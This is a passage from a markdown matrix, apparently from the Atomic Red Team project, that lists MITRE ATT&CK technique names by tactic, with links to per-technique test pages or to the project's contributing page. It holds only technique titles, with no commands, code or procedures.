TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | [Device Driver Discovery](../../T1652/T1652.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Systemctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
|
||||
| Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [System Service Discovery](../../T1007/T1007.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Rootkit](../../T1014/T1014.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Browser Extensions](../../T1176/T1176.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | | [Data from Local System](../../T1005/T1005.md) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | IDE Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtual Machine Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
|
||||
| Wi-Fi Networks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Copy and Paste [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
|
||||
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | IDE Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | OS Credential Dumping: Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) | | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Bombing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses](../../T1562/T1562.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
|
||||
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Data Destruction](../../T1485/T1485.md) |
|
||||
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Remote Access Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | | | [Non-Standard Port](../../T1571/T1571.md) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) | | | | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
|
||||
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | [Non-Application Layer Protocol](../../T1095/T1095.md) | |
|
||||
| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Overwrite Process Arguments [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
